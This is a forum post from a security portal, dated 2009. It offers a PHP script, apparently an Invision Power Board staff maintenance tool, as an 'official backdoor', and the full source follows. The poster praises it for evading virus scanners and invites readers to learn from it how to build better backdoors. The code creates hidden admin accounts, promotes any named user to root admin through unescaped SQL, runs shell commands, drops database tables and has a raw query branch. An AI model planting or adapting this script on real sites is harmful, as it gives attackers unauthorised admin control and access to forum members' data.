Waraxe IT Security Portal
IPB Staff Official Backdoor for IPB (SupaScript)
Posted: Sun Mar 22, 2009 8:40 am
GirlyDresses
Beginner
Joined: Mar 22, 2009
Posts: 3




One idiot staff member accidentally left this when repairing my site. It is a very rare official backdoor for IPB.

This works on 2.2 (All versions), 2.1 (All Versions) and 3 beta.

Exact features are as follows:

* Mail Tester
* Server Date Time
* Junk Finder
* Forum Root
* Index Checker
* Create Admin
* Create Admin 2.1
* Remove Admin
* Promote
* PHP Info
* UnCopyright
* m.has_blog
* serverinfo
* Check Converge
* vCheck
* UnGallery
* Totals

The best part about this is that it is detected as 1/10 on the virus scanner (Not detected as virus) and automatically finds and connects to the database (gets password, user, etc. automatically).

If anything, you can learn from their script how to make better backdoors like how they made an admin via SQL etc.

It is a PHP file so it does require either FTP access or to exploit it any way you would install any other shell.

The official file was called SupaScript.php when it was left on the server. The notes said "Keith's Copy" which I assume is the staff who worked on repairing the site.

Code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

"http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>IPB Misc. Tools</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<style type="text/css">

TABLE, TR, TD { font-family:Verdana, Arial;font-size: 11px; color:#000000; line-height:120% }

BODY { font: 10px Verdana; color:#222222 }

a:link, a:visited, a:active { color:#222222;font-weight:bold }

a:hover { color:#333377;text-decoration:underline }





#normal { font: 10px Verdana; color:#333333 }



#title { font-size:12px; font-weight:bold; line-height:150%; color:#FFFFFF; height: 30px; }

#title a:link, #title a:visited, #title a:active { text-decoration: underline; color : #FFFFFF;

font-size:11px }



#detail { font-family: Arial; font-size:11px; color: #333333 }



#large { font-family: verdana, arial; font-size:18px; color:#222; font-weight:bold; letter-spacing:-1px }



#subtitle { font-family: Arial,Verdana; font-size:16px; color:#000066; font-weight:bold }

#smalltitle { font-family: Arial,Verdana; font-size:11px; color:#000066; font-weight:bold }



#table1 { background-color:#FFFFFF; width:100%; align:center; border:1px solid black }



#tdrow1 { background-color:#EEF2F7 }



#subforum { background-color:#DFE6EF }



#tdrow2 { background-color:#F5F9FD }



#catrow { font-weight:bold; height:24px; line-height:150%; color:#4C77B6; background-image:

url(style_images/1/tile_sub.gif); }

#catrow2 { font-size:10px; font-weight:bold; line-height:150%; color:#4C77B6; background-color:#D3DFEF; }



#tablewrap { background-color:#F5F9FD }



#copy { color:#222; font-size:10px }

#copy a:link, #title a:visited, #title a:active { font-weight:normal }



#tdtop { font-weight:bold; height:24px; line-height:150%; color:#FFFFFF; background-image:

url(ipbtester.php?image=background); }



#memgroup { border:1px solid #777777 }



#mgred { border:1px solid #777777; background-color: #f5cdcd }

#mggreen { border:1px solid #777777; background-color: #caf2d9 }

#mgblue { border:1px solid #777777; background-color: #DFE6EF }



#green { background-color: #caf2d9 }

#red { background-color: #f5cdcd }



#button { background-color: #4C77B6; color: #FFFFFF; font-family:Verdana, Arial; font-size:11px }



#editbutton { background-color: #DDDDDD; color: #000000; font-family:Verdana, Arial; font-size:9px }



#textinput { background-color: #FFFFFF; color:#000000; font-family:Verdana, Arial; font-size:10px }



#dropdown { background-color: #F5F9FD; color:#000000; font-family:Verdana, Arial; font-size:10px }



#multitext { background-color: #F5F9FD; color:#000000; font-family:Verdana, Arial; font-size:10px }



</style></head>



<body marginheight='0' marginwidth='0' leftmargin='0' topmargin='0' bgcolor='#EFEFEF'>



<table cellspacing='0' cellpadding='0' align='center' width='95%' bgcolor='#FFFFFF' width="80%" border="0" align="center" style='border-right:4px

solid #BBBBBB;border-bottom:4px solid #BBBBBB'>

<tr>

<td colspan="3" align='center' id='title' bgcolor='#2C55B1'>Invision Power Board Test Scripts</td>

</tr>

<?php



define( 'ROOT_PATH' , "./" );

define( 'KERNEL_PATH', ROOT_PATH.'ips_kernel/' );



//----------------------------------------------

// Stored Functions

//---------------------------------------------



//Safe Slashes

function txt_safeslashes($t="")

{

return str_replace( '\\', "\\\\", txt_stripslashes($t));

}



//Strip Slashes

function txt_stripslashes($t)

{

if ( get_magic_quotes_gpc() )

{

$t = stripslashes($t);

}



return $t;

}



//rebuild_cache

function setting_rebuildcache()

{

global $ibforums, $DB;



$ibforums->cache['settings'] = array();



$DB->simple_construct( array( 'select' => '*', 'from' => 'conf_settings', 'where' => 'conf_add_cache=1' ) );

$info = $DB->simple_exec();



while ( $r = $DB->fetch_row($info) )

{

$value = $r['conf_value'] != "" ? $r['conf_value'] : $r['conf_default'];



if ( $value == '{blank}' )

{

$value = '';

}



$ibforums->cache['settings'][ $r['conf_key'] ] = txt_safeslashes($value);

}



update_cache( array( 'name' => 'settings', 'array' => 1, 'deletefirst' => 1 ) );

}



//Update Cache

function update_cache( $v=array() )

{

global $ibforums, $DB;



//-----------------------------------------

// Don't cache forums?

//-----------------------------------------



if ( $v['name'] == 'forum_cache' AND $ibforums->vars['no_cache_forums'] )

{

return;

}



//-----------------------------------------

// Next...

//-----------------------------------------



if ( $v['name'] )

{

if ( ! $v['value'] )

{

$value = $DB->add_slashes(serialize($ibforums->cache[ $v['name'] ]));

}



$DB->manual_addslashes = 1;



if ( $v['deletefirst'] == 1 )

{

if ( $v['donow'] )

{

if ( $ibforums->vars['sql_driver'] == 'mysql' )

{

$DB->query( "REPLACE INTO ".SQL_PREFIX."cache_store SET cs_key='{$v['name']}', cs_value='$value',

cs_array=".intval($v['array']) );

}

else

{

$DB->simple_construct( array( 'delete' => 'cache_store', 'where' => "cs_key='{$v['name']}'" ) );

$DB->simple_exec();



$DB->do_insert( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_key' => $v['name'],

'cs_value' => $value ) );

}

}

else

{

if ( $ibforums->vars['sql_driver'] == 'mysql' )

{

$DB->cur_query = "REPLACE INTO ".SQL_PREFIX."cache_store SET cs_key='{$v['name']}',

cs_value='$value', cs_array=".intval($v['array']);

$DB->cache_shutdown_exec();

}

else

{

$DB->simple_construct( array( 'delete' => 'cache_store', 'where' => "cs_key='{$v['name']}'" ) );

$DB->simple_shutdown_exec();



$DB->do_shutdown_insert( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_key' =>

$v['name'], 'cs_value' => $value ) );

}

}

}

else

{

if ( $v['donow'] )

{

$DB->do_update( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_value' => $value ),

"cs_key='{$v['name']}'" );

}

else

{

$DB->do_shutdown_update( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_value' => $value ),

"cs_key='{$v['name']}'" );

}

}



$DB->manual_addslashes = 0;

}

}





//----------------------------------------------

// END OF USER EDITABLE COMPONENTS

//---------------------------------------------



error_reporting (E_ERROR | E_WARNING | E_PARSE);

set_magic_quotes_runtime(0);



require ROOT_PATH."conf_global.php";





//--------------------------------

// Load the DB driver and such

//--------------------------------



$INFO['sql_driver'] = ! $INFO['sql_driver'] ? 'mysql' : strtolower($INFO['sql_driver']);



require ( KERNEL_PATH.'class_db_'.$INFO['sql_driver']."_client.php" );



$DB = new db_driver_mysql;



$DB->obj['sql_database'] = $INFO['sql_database'];

$DB->obj['sql_user'] = $INFO['sql_user'];

$DB->obj['sql_pass'] = $INFO['sql_pass'];

$DB->obj['sql_host'] = $INFO['sql_host'];

$DB->obj['sql_tbl_prefix'] = $INFO['sql_tbl_prefix'];

$DB->obj['use_shutdown'] = 0;



//--------------------------------

// Get a DB connection

//--------------------------------



$DB->connect();



//--------------------------------

// Make CONSTANT

//--------------------------------



define( 'SQL_PREFIX', $DB->obj['sql_tbl_prefix'] );

define( 'SQL_DRIVER', $INFO['sql_driver'] );

define( 'BOARD_URL', $INFO['board_url'] );

define( 'IN_ACP', 1 );



$act = $_POST['act'];

$email = $_POST['email'];

$pass = md5($_POST['pass']);

$aupass = '225517b79a5066eae41064807e6fe248';

switch ($act) {



default :

?>

<form name="form1" method="post" action="supascript.php">

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Password">

</div></td>

<td>

<div align="left">

<input type="text" name="pass">

</div></td>

<td> <div align="center">Enter Password.</div></td>

</tr>

</form>

<?php

break;



case "Password" :



if ($pass != $aupass){

echo "<tr><td>You are not authorized</td></tr>";

exit();

}



?>





<form name="form1" method="post" action="supascript.php">



<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Mail Tester">

</div></td>

<td></td>

<td> <div align="center">Tests PHPMail. Be sure to add the email address you want to use for testing to the code.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Server Date Time">

</div></td>

<td></td>

<td> <div align="center">Checks the Date and Time on server</div></td>

</tr>



<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Junk Finder">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Finds whitespace at the beginning or end of a file. </div></td>

</tr>

<tr>

<td height="26"><div align="right">

<input type="submit" name="act" value="Forum Root">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">The path to the forum root directory.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Index Checker">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Test the DB indexes. (requires a working board install) </div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Create Admin">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Adds an admin account, named IPSTech with a random password.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Create Admin 2.1">

</div></td>

<td><div align="center"></div></td>

<td><div align="center"><font color='red'><b>FOR IPB 2.1.X</b></font> - Adds an admin account, named IPSTech with a random password.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Remove Admin">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Remove the IPSTech account.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Promote">

</div></td>

<td>

<div align="left">

<input type="text" name="aname">

</div></td>

<td> <div align="center">Turns the specified account into a member of the root admin group.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="PHP info">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Extended PHP info.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="UnCopyright">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Undo illegitimate copyright output removal. Update settings cache.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="m.has_blog">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Fixes the m.has_blog MySQL error.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="serverinfo">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Checks the server hardware.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Check Converge">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Checks the converge tables for mismatched email addresses.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="vCheck">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">File version checker.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="UnGallery">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Runs the queries to remove the Gallery tables/fields.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Totals">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Gets board totals: Posts/Members/Topcis/etc.</div></td>

</tr>

</form>

<?php



break;



case "Create Admin" :

echo "<tr><td>";





//----------------------

// Setup Converge

//----------------------



$salt = "5lo9f";

$salt = str_replace( '\\', "\\\\", $salt );

$randpw = rand(1000, 9999);



$converge_array = array(



'converge_id' => '',

'converge_email' => 'tech@invisionpower.com',

'converge_joined' => time(),

'converge_pass_hash' => md5( md5($salt) . md5($randpw) ),

'converge_pass_salt' => $salt



);

$DB->do_insert('members_converge', $converge_array);

$new_id = $DB->get_insert_id();

$members_array = array(



'id' => $new_id,

'name' => mysql_escape_string('IPSTech'),

'mgroup' => 4,

'email' => 'tech@invisionpower.com',

'joined' => time(),

'ip_address' => '127.0.0.1',

'posts' => 0,

'title' => '',

'allow_admin_mails' => '',

'hide_email' => 1,

'email_pm' => 0,

'language' => 'en',

'last_post' => '',

'view_sigs' => 1,

'view_img' => 1,

'view_avs' => 1,

'last_visit' => time(),

'last_activity' => time(),

'misc' => '',

'member_login_key' => '6a2e8dfcf00c70ba13bfbac204e8d841',



);



$members_extra_array = array(



'id' => $new_id,

'vdirs' => "in:Inbox|sent:Sent Items",

);





$DB->do_insert('members', $members_array);





$DB->do_insert('member_extra', $members_extra_array);



echo "<b>IPSTech</b> admin account created. Password is <b>$randpw</b>.";





echo "</td></tr>";

break;





// FOR 2.1.1 -- Adds Display Name



case "Create Admin 2.1" :

echo "<tr><td>";





//----------------------

// Setup Converge

//----------------------



$salt = "5lo9f";

$salt = str_replace( '\\', "\\\\", $salt );

$randpw = rand(1000, 9999);



$converge_array = array(



'converge_id' => '',

'converge_email' => 'tech@invisionpower.com',

'converge_joined' => time(),

'converge_pass_hash' => md5( md5($salt) . md5($randpw) ),

'converge_pass_salt' => $salt



);

$DB->do_insert('members_converge', $converge_array);

$new_id = $DB->get_insert_id();

$members_array = array(



'id' => $new_id,

'name' => mysql_escape_string('IPSTech'),

'mgroup' => 4,

'email' => 'tech@invisionpower.com',

'joined' => time(),

'ip_address' => '127.0.0.1',

'posts' => 0,

'title' => '',

'allow_admin_mails' => '',

'hide_email' => 1,

'email_pm' => 0,

'language' => 'en',

'last_post' => '',

'view_sigs' => 1,

'view_img' => 1,

'view_avs' => 1,

'last_visit' => time(),

'last_activity' => time(),

'misc' => '',

'member_login_key' => '6a2e8dfcf00c70ba13bfbac204e8d841',

'members_display_name' => 'IPSTech',

'members_l_display_name' => 'IPSTech',

'members_l_username' => 'IPSTech',

);



$members_extra_array = array(



'id' => $new_id,

'vdirs' => "in:Inbox|sent:Sent Items",

);





$DB->do_insert('members', $members_array);





$DB->do_insert('member_extra', $members_extra_array);



echo "<b>IPSTech</b> admin account created. Password is <b>$randpw</b>.";





echo "</td></tr>";

break;



case "Mail Tester" :

echo "<tr><td>Testing phpmail.<br><br>";





$mailtest = mail('keith@invisionpower.com', 'Test Successful', 'If you got this...it works');



if($mailtest){

echo "It was sent";}

else{

echo "Not so much";}

echo "</td></tr>";



break;



case "Server Date Time" :

echo "<tr><td><br><font color='red'>Current Time: </font><b>". date("m-d-Y h:ia",time());

echo "</b></td></tr>";



break;



case "Forum Root" :

echo "<tr><td>Full path to this folder: <b>".getcwd()."/</b>";

echo "<br /><br />";

echo "Safe mode is: <b>";



if( ini_get('safe_mode') )

{

echo "Enabled";

}



else

{

echo "Disabled";

}

echo "</b>";

echo "</td></tr>";

break;



case "Junk Finder" :



echo "<tr><td>Testing for Whitespace<br>";

error_reporting(~E_NOTICE);

set_time_limit(0);



$broken = array();



function recur_dir($dir)

{

$dirlist = opendir($dir);



while ( false !== ($file = readdir($dirlist)) )

{

if ( preg_match( "#^_#", $file ) ) { continue; }

if ($file != '.' && $file != '..')

{

$newpath = $dir.'/'.$file;

$level = explode('/',$newpath);



if (is_dir($newpath) && !skip_this($file))

{

recur_dir($newpath);

}

else

{

if(strpos($file, ".php") !== false && !is_dir($newpath))

{

$file = file($newpath);

$file = implode($file);



preg_match("#^(.+?)?<\?(.*)\?>(.+?)?$#si", $file, $matches);



if($matches[1] != "")

{

echo "<i>" . $newpath . " </i>Has Junk! At The Front Of File<br>";

flush();

}



if($matches[3] != "")

{

echo "<span style='color:red'><b>" . $newpath . " </b></span>Has Junk! At The End Of

File<br>";

flush();

}

}

}

}

}

closedir($dirlist);

}



function skip_this($file)

{

if($file == "uploads" || $file == "style_images" || $file == "cache" || $file == "install" || $file == "upgrade" || $file =="gallery_setup"

|| $file == "gallery_setup"

|| $file == "jscripts" || $file == "style_emoticons" || $file == "style_avatars" || $file == "conv_api" ||

$file == "skin_acp" || $file == "gallery" || $file == "admin")



{

return 1;

}



else

{

return 0;

}

}



recur_dir('.');

echo "</td></tr>";

break;



case "Index Checker" :

echo "<tr><td>";



//===========================================================================

// SET UP REQUIRED INDEXES

//===========================================================================



$indexes = array();



$indexes[] = array( 'table' => 'attachments',

'index' => array(

0 => array( 'attach_pid' , '' ),

1 => array( 'attach_msg' , '' ),

2 => array( 'attach_post_key' , '' ),

3 => array( 'attach_mid_size' , 'attach_member_id,attach_filesize' ),

) );



$indexes[] = array( 'table' => 'member_extra',

'index' => array( 0 => array( 'id', '' ) ) );



$indexes[] = array( 'table' => 'members_converge',

'index' => array( 0 => array( 'converge_id', '' ) ) );



$indexes[] = array( 'table' => 'members',

'index' => array(

0 => array( 'id' , '' ),

1 => array( 'name' , '' ),

2 => array( 'mgroup' , '' ),

3 => array( 'bday_day' , '' ),

4 => array( 'bday_month', '' )

) );





$indexes[] = array( 'table' => 'message_text',

'index' => array(

0 => array( 'msg_date' , '' ),

1 => array( 'msg_sent_to_count' , '' ),

2 => array( 'msg_deleted_count' , '' ),

) );



$indexes[] = array( 'table' => 'message_topics',

'index' => array(

0 => array( 'mt_from_id' , '' ),

1 => array( 'mt_owner_id' , 'mt_owner_id,mt_to_id,mt_vid_folder' ),

) );



$indexes[] = array( 'table' => 'moderators',

'index' => array(

0 => array( 'forum_id' , '' ),

1 => array( 'group_id' , '' ),

2 => array( 'member_id' , '' ),

) );





$indexes[] = array( 'table' => 'posts',

'index' => array(

0 => array( 'topic_id' , 'topic_id,queued,pid' ),

1 => array( 'author_id' , 'author_id,topic_id' ),

2 => array( 'post_date' , '' ),

) );



$indexes[] = array( 'table' => 'sessions',

'index' => array(

0 => array( 'in_topic' , '' ),

1 => array( 'in_forum' , '' ),

) );



$indexes[] = array( 'table' => 'skin_templates_cache',

'index' => array(

0 => array( 'template_set_id' , '' ),

1 => array( 'template_group_name' , '' ),

) );



$indexes[] = array( 'table' => 'topics',

'index' => array(

0 => array( 'topic_firstpost' , '' ),

1 => array( 'last_post' , '' ),

2 => array( 'forum_id' , 'forum_id,approved,pinned' ),

) );



//-----------------------------------------

// GO LOOOOOOOPY

//-----------------------------------------



$output = array();



foreach( $indexes as $id => $data )

{

$table_name = $data['table'];



$DB->query( "SHOW CREATE TABLE ".SQL_PREFIX.$table_name );



$row = $DB->fetch_row();



$tbl = str_replace( '`', '', $row['Create Table'] );



//print "<pre>$tbl</pre>";



if ( is_array( $data['index'] ) and count( $data['index'] ) )

{

foreach( $data['index'] as $idx => $indexes )

{

$index_name = $indexes[0];

$ok = 0;



if ( preg_match( "#KEY\s+?\(?{$index_name}\)?(?:(?:\s+?)?\((.+?)\))?#s", $tbl, $match ) )

{

$ok = 1;



//-----------------------------------------

// Multi index column?

//-----------------------------------------



if ( $indexes[1] )

{

foreach( explode( ',', $indexes[1] ) as $mc )

{

$mc = trim( $mc );



if ( ! strstr( $match[1], $mc ) )

{

$output[] = "<span style='color:red'>Error : Table $table_name : Index $index_name :

Missing field '$mc' from multi-column index</span>";

$ok = 0;

}

}

}

}

else

{

$output[] = "<span style='color:red'>Error : Table $table_name : Missing index $index_name</span>";

}



if ( $ok )

{

$output[] = "<span style='color:green'>Table $table_name - Index $index_name OK!</span>";

}

}

}

}



print "<html>

<head><title>IPB 2.0.1 DB Checker</title></head>

<body style='font-family:verdana;font-size:12px;padding:10px'>

<p>

<strong>This script will check for the required MySQL database indexes in IPB 2.0.x</strong>

<br />

</p>

<p>

<strong>Script output:</strong><br />";



print implode( "<br />", $output );



echo "</td></tr>";





break;



case 'Remove Admin':

echo "<tr><td>";

$DB->query("SELECT id, email from ".SQL_PREFIX."members WHERE name = 'ipstech'");

$member = $DB->fetch_row();

$DB->query("DELETE FROM ".SQL_PREFIX."members WHERE name = 'ipstech'");

$DB->query("DELETE FROM ".SQL_PREFIX."member_extra WHERE id = {$member['id']}");

$DB->query("DELETE FROM ".SQL_PREFIX."members_converge WHERE converge_email = '{$member['email']}'");

echo "IPSTech admin account is now removed.";

echo "</td></tr>";

break;



case 'serverinfo':

echo "<tr><td>";

echo "<pre><b>Uptime:</b><br>";

system("uptime");

echo "<br><br>";



echo "<b>System Information:</b><br>";

system("uname -a");

echo "<br><br>";



echo "<b>Memory Usage (MB):</b><br>";

system("free -m");

echo "<br><br>";



echo "<b>Disk Usage:</b><br>";

system("df -h");

echo "<br><br>";



echo "<b>CPU Information:</b><br>";

system("cat /proc/cpuinfo | grep \"model name\\|processor\"");

echo "</pre></td></tr>";

break;



case 'PHP info':

echo "<tr><td id='large'>";

phpinfo();

echo "</td></tr>";

break;



case 'UnCopyright':

echo "<tr><td>";

$DB->query("UPDATE ".SQL_PREFIX."conf_settings SET conf_value='' where conf_key='ipb_copy_number' LIMIT 1");

echo "Copyright output removal is now undone.<br>";

setting_rebuildcache();

echo "</td></tr>";

break;



case 'm.has_blog':

echo "<tr><td>";

$DB->query("ALTER TABLE ".SQL_PREFIX."members add has_blog TINYINT(1) NOT NULL default '0'");

echo "m.has_blog MySQL <i>should</i> not appear anymore.<br>";

echo "</td></tr>";

break;



case 'Promote':

echo "<tr><td>";

$DB->query("UPDATE ".SQL_PREFIX."members SET mgroup=4 WHERE name='$aname'");

echo "<b>$aname</b> is now an admin.";

echo "</td></tr>";

break;



case 'Manual Query':

echo "<tr><td>";

$test = mysql_query("$query");

echo "<b>$query</b> has been run.<br />";

$count = 1;

while ($result = mysql_fetch_assoc($test)){

echo "<b>$count<br /></b>";

foreach($result as $k => $v){

echo "$k=$v<br />";

} $count++;

echo "<br />";

}

echo "</td></tr>";

break;



case 'Check Converge':

echo "<tr><td>";

$DB->query("SELECT mem.id, mem.email, converge.converge_email FROM ".SQL_PREFIX."members mem LEFT JOIN ".SQL_PREFIX."members_converge converge ON

(converge.converge_id = mem.id)");

while ( $row = $DB->fetch_row() ){

$id = $row['id'];

$con_email = $row['converge_email'];

$mem_email = $row['email'];

if ($con_email == $mem_email){

echo "ID ". $id ." is a match.<br>";}

else{

echo "<br><span style='color:red'>ID ". $id ." is not a match!</span><br>";

echo "Member table email is " . $mem_email ." and converge table email is " .$con_email ."<br><br>";

}

}

echo "<br><br><form name=\"form2\" method=\"post\" action=\"supascript.php\">";

echo "<input type=\"submit\" name=\"act\" value=\"Fix Converge\"> Fixes email addresses, replacing converge_email with the data from

".SQL_PREFIX."members.";

echo "</form>";

echo "</td></tr>";

break;



case 'Fix Converge':

echo "<tr><td>";

$outer = $DB->query("SELECT mem.id, mem.email, converge.converge_email FROM ".SQL_PREFIX."members mem LEFT JOIN ".SQL_PREFIX."members_converge converge ON

(converge.converge_id = mem.id)");

while ( $row = $DB->fetch_row( $outer ) ){

$id = $row['id'];

$con_email = $row['converge_email'];

$mem_email = $row['email'];

if ($con_email == $mem_email){

echo "ID ". $id ." is a match, bypassed.<br>";

}

else{

echo "<br><span style='color:red'>ID ". $id ." is not a match!</span><br>";

$DB->query("UPDATE ".SQL_PREFIX."members_converge SET converge_email='$mem_email' WHERE converge_email='$con_email'");

echo "Member's converge e-mail has been set to <span style='color:green'><b>" . $mem_email ."</b></span><br><br>";

}

}

echo "</td></tr>";

break;



case 'vCheck':



echo "<tr><td>";

echo "</td></tr>";



// Check Files



class CheckFiles

{



var $file_versions = array();



function check_files($dir)

{

$dirlist = opendir($dir);



while (false !== ($file = readdir($dirlist)))

{

if ($file != '.' && $file != '..')

{

$newpath = $dir.'/'.$file;



if (is_dir($newpath) && !$this->skip_this($file))

{

$this->check_files($newpath);

}

else

{

if(is_dir($newpath))

{

continue;

}

$check = file_get_contents($newpath);



if (preg_match("/Board v2.1.1/i", "$check")) {

$preg_return = '<i class="hver">2.1.1</i>';

} elseif (preg_match("/Board v2.1.0/i", "$check")) {

$preg_return = '<i class="gver">2.1.0</i>';

} elseif (preg_match("/Board v2.0.4/i", "$check")) {

$preg_return = '<i class="fver">2.0.4</i>';

} elseif (preg_match("/Board v2.0.3/i", "$check")) {

$preg_return = '<i class="ever">2.0.3</i>';

} elseif (preg_match("/Board v2.0.2/i", "$check")) {

$preg_return = '<i class="dver">2.0.2</i>';

} elseif (preg_match("/Board v2.0.1/i", "$check")) {

$preg_return = '<i class="cver">2.0.1</i>';

} elseif (preg_match("/Board v2.0.0/i", "$check")) {

$preg_return = '<i class="bver">2.0.0</i>';

} elseif (preg_match("/Board v1/i", "$check")) {

$preg_return = '<i class="aver">1.x</i>';

} else {

$preg_return = '<b>n/a</b>';

}



$insert = "". $newpath ." = ". $preg_return ."";



$this->file_versions[] = $insert;

}

}

}

closedir($dirlist);



}



// Files to skip - duh.



function skip_this($file)

{

// $file == "admin" || - Preventing /sources/admin/ directory.

if($file == "lang" || $file == "skin_cache" || $file == "uploads" || $file == "style_images" || $file == "cache" || $file == "install" || $file == "upgrade" || $file =="gallery_setup" || $file == "gallery_setup"

|| $file == "jscripts" || $file == "style_emoticons" || $file == "style_avatars" || $file == "conv_api" || $file == "skin_acp" || $file == "gallery" || $file == "modules")



{

return 1;

}



else

{

return 0;

}

}



}



// Run it, bebbeh!



$filechecker = new CheckFiles;



$filechecker->check_files('.');



print "

<style type=\"text/css\">

/*/============================================================================/

| Cascading Style Sheet (CSS 467), for vcheck.php

| Author: James A. Mathias, admin@1lotus.com, http://www.1lotus.com

| Copyright: 2005 Onelotus Creative and James A. Mathias. All rights reserved.

|

| All style rule attributes in alpha-numeric order starting from 0

/============================================================================/

| This style sheet is closed source, unauthorized use will result in prosecution

| Please respect my intellectual property rights and trademarks

| x = horizontal, y = vertical / property: trbl, tb rl, t rl b, t r b l;

|

| -- START STYLES --

/============================================================================/*/



*{ /* removes margin/padding from all elements */

margin: 0;

padding: 0;

}



body{

background: #FFF;

font: normal 62.5%/135% Verdana, Sans-Serif;

}



h1{

color: #036;

font: bold 2.6em/135% \"Trebuchet MS\", Sans-Serif;

padding: 8px;

}



pre{

background: #F5F5F5;

border: 1px solid;

border-color: #CCC #AAA #AAA #CCC;

color: #222;

font-size: 1.7em;

padding: 15px 15px 0;

margin: 0 auto 5px;

width: 95%;

}



b{ color: #666666; }



i.aver{ color: #FFCC00; }

i.bver{ color: #F000FF; }

i.cver{ color: #12BB00; }

i.dver{ color: #0018FF; }

i.ever{ color: #00BAFF; }

i.fver{ color: #338000; }

i.gver{ color: #3366FF; }

i.hver{ color: #00CC66; }





/*/============================================================================/

| -- END STYLES --

| Please do not steal my code.

| Thank you.

/============================================================================/*/

</style>

<h1>Here are the versions!</h1>

<pre>

";



print_r($filechecker->file_versions);



print "

</pre>

";



break;



case 'UnGallery':



echo "<tr><td>";

$DB->query("DROP TABLE `".SQL_PREFIX."gallery_albums`, `".SQL_PREFIX."gallery_upgrade_history`, `".SQL_PREFIX."gallery_bandwidth`, `".SQL_PREFIX."gallery_categories`, `".SQL_PREFIX."gallery_comments`, `".SQL_PREFIX."gallery_ecardlog`, `".SQL_PREFIX."gallery_favorites`, `".SQL_PREFIX."gallery_form_fields`, `".SQL_PREFIX."gallery_images`, `".SQL_PREFIX."gallery_media_types`, `".SQL_PREFIX."gallery_ratings`;");

echo "Tables dropped, next!<br /><br />";

$DB->query("ALTER TABLE `".SQL_PREFIX."groups` DROP `g_max_diskspace`, DROP `g_max_upload`, DROP `g_max_transfer`, DROP `g_max_views`, DROP `g_create_albums`, DROP `g_album_limit`, DROP `g_zip_upload`, DROP `g_multi_file_limit`, DROP `g_img_album_limit`, DROP `g_slideshows`, DROP `g_favorites`, DROP `g_comment`, DROP `g_rate`, DROP `g_ecard`, DROP `g_edit_own`, DROP `g_del_own`, DROP `g_move_own`, DROP `g_mod_albums`, DROP `g_img_local`, DROP `g_movies`, DROP `g_movie_size`;");

echo "Groups table altered, next!<br /><br />";

$DB->query("ALTER TABLE `".SQL_PREFIX."members` DROP `gallery_perms`;");

echo "Members table altered, next!<br /><br />";

$DB->query("DELETE FROM `".SQL_PREFIX."conf_settings` WHERE conf_key LIKE 'gallery_%';");

echo "Conf_settings information deleted, next!<br /><br />";

$DB->query("DELETE FROM `".SQL_PREFIX."conf_settings_titles` WHERE conf_title_title = 'Invision Gallery Settings';");

echo "More conf_settings stuff deleted, moving on!<br /><br />";

$DB->query("DELETE FROM `".SQL_PREFIX."skin_templates` WHERE group_name LIKE 'skin_gallery_%';");

echo "Finally! Gallery skin template bits removed. Now, go about removing them there gallery files.";

setting_rebuildcache();

echo "</td></tr>";



break;



case 'Totals' :



echo "<tr><td><br /><br />";

$DB->query("SELECT count(*) FROM `".SQL_PREFIX."posts`;");

$pcount = $DB->fetch_row();

echo "Total posts: ". $pcount['count(*)'] . "<br />";

$DB->query("SELECT count(*) FROM `".SQL_PREFIX."topics`;");

$tcount = $DB->fetch_row();

echo "Total topics: ". $tcount['count(*)'] . "<br /><br />";

$DB->query("SELECT count(*) FROM `".SQL_PREFIX."members`;");

$mcount = $DB->fetch_row();

echo "Total members: ". $mcount['count(*)'] . "<br />";

$DB->query("SELECT count(*) FROM `".SQL_PREFIX."members_converge`;");

$mccount = $DB->fetch_row();

echo "Total members_converge: ". $mccount['count(*)'] . "<br />";

$DB->query("SELECT count(*) FROM `".SQL_PREFIX."member_extra`;");

$mecount = $DB->fetch_row();

echo "Total member_extra: ". $mecount['count(*)'] . "<br />";

echo "<br /><br /></td></tr>";



break;



}



echo "<tr><td colspan='3' align='center' id='copy'>Invision Power Board &copy 2005 <a href='http://www.invisionpower.com' target='_blank'>Invision Power Services, Inc.</a><br><br>( <a href='" . BOARD_URL . "/index.php'>Board URL</a> | <a href='" . BOARD_URL . "/admin.php'>Admin CP</a> )<br> ;;</td></tr></table></body></html><!-- Keith's copy -->";

?>
View user's profile Send private message
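
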